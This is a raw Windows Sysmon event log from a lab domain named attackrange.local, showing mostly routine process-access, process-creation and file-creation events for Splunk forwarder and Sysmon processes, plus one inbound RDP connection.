4d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051196Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051195Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051194Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051193Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051192Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051191Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051190Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051189Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-ECAA-607E-0307-00000000BB01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051188Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECAA-607E-0307-00000000BB01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051187Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-ECAA-607E-0307-00000000BB01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.901{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAB4007CB3C2B1851EA3F2A2902DDF63,SHA256=11502ED6F5DD32FDE0B1224B05CA8A5DD40AD1CDA7EF74B9AA746DCCE5B0EB80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECAB-607E-750F-00000000BB01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-ECAB-607E-750F-00000000BB01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.838{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECAB-607E-750F-00000000BB01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.839{A7A01FEF-ECAB-607E-750F-00000000BB01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000082456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:57.347{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44682-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.479{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E98CB300A08B54FD02C872CD9B6B991,SHA256=FACC91B6F5CB7D7343606EFE58329A90D3008B59ABBA5E4A14899172F763A553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.229{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051220Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECAB-607E-0407-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051219Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051218Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051217Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051216Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051215Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051214Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 